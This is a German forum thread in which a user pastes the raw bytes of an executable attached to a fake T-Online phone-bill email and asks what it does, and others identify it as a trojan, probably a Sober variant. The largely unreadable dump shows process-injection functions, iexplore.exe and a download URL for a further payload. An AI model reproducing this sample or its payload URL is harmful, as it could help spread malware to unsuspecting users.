E-Mail Fake von T-Online

[Seebaer]

Ahoi

Kann jemand sagen was diese Datei als Exe anstellt?
War bei einer Mail die die Telefonrechnung von T-Online vorgaukelt.


MZ�   ÿÿ ¸ @ ˆ Fv;'A;'A;'A;'A/'AÇ
A:'Aü!A:'ARich;'A PE L
 ÚU{B à 


 ¡  @     @        Ø < 0 °  D .text j 
 `.data æ   @ À.rsrc ° 0   @ @ 8 * H  ²  РŽ î   € j Ü X U.³0ûÿÿ£8 5¥�ɽͽ™Ñ¸9Q a&�ûÿÿ. .`&uó.a&uã.c &v@ûÿÿ@&uÒ£, Õɱµ½¹¸‘±± ÿUó£` UI1½Ý¹±½…‘Q½
…�¡•¥±• AÿUã&Ó£4 *•É¹•±Ìȸ‘±± ÿUó&€ûÿÿ£$ ±ÍÑɱ•¹ ÿÖ€ûÿÿÿUã&c£0
É•…Ñ•¥±• ÿÖ€ûÿÿÿUã&S£L
É•…Ñ•¥±•5…ÁÁ¥¹� ÿÖ€ûÿÿÿUã&C£8 5…ÁY¥•Ý=™¥±• ÿÖ€ûÿÿÿUã&3£0 •Ñ¥±•M¥é• ÿÖ€ûÿÿÿUã&#£ ]¥¹á•� ÿÖ€ûÿÿÿUã&£@ U¹µ…ÁY¥•Ý=™¥±• ÿÖ€ûÿÿÿUã&£0
±½Í•!…¹‘±• ÿÖ€ûÿÿÿUã&ò£0 á¥ÑAɽ�•ÍÍ ÿÖ€ûÿÿÿUã&â£4 …‘Ù…Á¥Ìȸ‘±± ÿUó&€ûÿÿ£T
ÉåÁÑ�Åեɕ
½¹Ñ•áÑ ÿÖ€ûÿÿÿUã&ã@
ÉåÁÑ
É•…Ñ•!…Í¡ ÿÖ€ûÿÿÿUã&³£8
ÉåÁÑ!…Í¡…Ñ… ÿÖ€ûÿÿÿUã&££H
ÉåÁÑ•Ñ!…Í¡A…É…µ ÿÖ€ûÿÿÿUã&“£D
ÉåÁÑ•ÍÑɽå!…Í¡ ÿÖ€ûÿÿÿUã&ƒ£P
ÉåÁÑI•±•…Í•
½¹Ñ•áÑ ÿÖ€ûÿÿÿUã&sÌ<ûÿÿ ÿÕÒÿUcã <; AÌAA¡  6öÒûÿÿ]ÿÕÒAÿUÓÌAA¡ A¡ ¡ 6öÒûÿÿ]ÿUSãÿ<ä &€ûÿÿÌAAA¡ AÿÖ€ûÿÿÿUCãÿ<X &pûÿÿÌ&`ûÿÿAAA¡ ÿÖpûÿÿÿU3ã <» &`ûÿÿ¡ ÿÖ€ûÿÿÿU#&Pûÿÿ¡ ¡ ¡ ÿÖ�ûÿÿ6°ûÿÿAÿUÃ,Õ ¡ ¡ ¡ ÿÖ�ûÿÿ6°ûÿÿAÿUÃã <& 6 ûÿÿAÌAA¡ ÿÖ°ûÿÿÿU³ã Ñ*¡ ÿÖPûÿÿÿÖ`ûÿÿÿÖ ûÿÿÿU£ã Ñ1Àûÿÿ ¡ 6ÀûÿÿA6ÐûÿÿA¡ ÿÖ ûÿÿÿU“ã Ñpæ@ .Ö@ûÿÿ6öÐûÿÿÏšÕ<ûÿÿÿÖ ûÿÿÿUƒ¡ ÿÖ°ûÿÿÿUsÿÖ`ûÿÿÿUÿÖpûÿÿÿUòÿÖ€ûÿÿÿUòö<ûÿÿÕD6öÒûÿ ÿ¡ ]ÿU¯(a
Ò§pûÿÿÌAÿUâ' U‹ìƒÄ¨h‹!@ h  j h�!@ h €èë
hâ"@ hÞ!@ j j hŠ!@ ÿ5‹!@ èÓ
ÿ5‹!@ è¼
�E¨Pèƒ
fÇEØ ÇEÔ
h  j@èv
‰EìhÐ!@ ÿuìè„
ÿuÿuìès
�EðP�E¨Pj j j j
j j ÿuìhÞ!@ è
ÿuìè8
‹EðÉ RSQhz j è
P‹Ð»D@ ¹z ŠÀȈBCâõXY[ZÃë h @ èí £5 @ h~!@ èÿÿÿ£ @ j@h  hz j ÿ5 @ èÒ £ @ z Pè‹ÿÿÿ£ @ j hz ÿ5 @ ÿ5 @ ÿ5 @ è¥ ÿ5 @ èŽ h& @ ÿ55 @ èf £= @ h @ ÿ55 @ èQ £9 @ [j hD
h9 @ Sÿ5 @ èW j j Sÿ5 @ j j ÿ5 @ è
j è ÿ%<@ ÿ%4@ ÿ%0@ ÿ% @ ÿ%@ ÿ%@ ÿ%@ ÿ%@ ÿ%8@ ÿ%$@ ÿ%(@ ÿ%,@ ÿ%@ ÿ% @ ÿ%@ ÌÌ$    \  8 * H  ² Â Ð Ž î   € j Ü X B CreateProcessA D CreateRemoteThread u ExitProcess )
GetProcAddress ;
GetStartupInfoA ©
LoadLibraryA ¯
LocalAlloc ³
LocalFree –VirtualAllocEx ÃWriteProcessMemory ÓlstrcatA ÜlstrcpyA KERNEL32.dll E
RegCloseKey \
RegOpenKeyExA e
RegQueryValueExA ADVAPI32.dll kernel32.dll LoadLibraryA GetProcAddress ä+Ä‹Xe¹A�urü&Ähttp://edgefilmsny.com/images/bio/test.exe about:blank Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE iexplore.exe 
  € 8 €

P €
€h €
 €
 � °0 è ˜3 
0 ( @
 €  € € €€ € € € €€ €€€ ÀÀÀ ÿ ÿ ÿÿ ÿ ÿ ÿ ÿÿ ÿÿÿ wwwwwwwwwww  ˆˆˆˆˆˆˆˆˆˆˆ €ˆppx xp ‡ wˆ ‡x ˆxppx xpx ˆ ‰ˆˆˆˆˆˆ ˆp‰˜ˆˆˆˆˆ ˆˆˆ™ˆˆˆˆˆˆˆ ˆˆˆ‰˜ˆˆˆˆˆˆ ˆˆˆˆ™ˆˆˆˆ‰˜ ˆˆˆˆ‰™™™™˜˜ ˆˆˆˆˆ˜ˆ™™™ˆ ˆˆˆˆˆ™‰˜ˆˆˆ ˆˆˆˆˆ‰™ˆˆˆˆ ˆˆˆˆˆ‰˜ˆˆˆˆ ˆˆˆˆˆ‰˜ˆˆˆˆ ˆˆˆˆˆ‰˜ˆˆˆˆ ˆˆˆˆˆ‰˜ˆˆˆˆ wwwwwqwˆˆˆ ˆˆˆ ™™™™™™™™™™ˆˆˆ ™Ÿ™™ÿùŸ™™™ˆˆˆ ™Ÿ™™ùŸŸ™™™ˆˆˆ ™Ÿÿ™ùŸŸÿ™™ˆww ™Ÿ™ùùŸŸ™™™€ ™Ÿÿ™ÿùŸÿù™€™™ ™™™™™™™™™™€™� €™ ˆˆˆˆˆˆˆˆ€� ÿ€ þ þ þ þ þ þ þ þ þ þ þ þ þ þ þ þ þ þ þ þ

 þ þ 


 è




Grüße

Seebaer

[kerri]

Sicher nichts gutes.

Einer aus meinem Buero hat das vorhin auch bekommen, ist vermutlich eine Sober-Variante.

Gruesse, kerri

EDIT: Jupp, ist ein Trojaner: Meldung auf heise

[freezer]

War ja klar, sowas erreicht mich nie.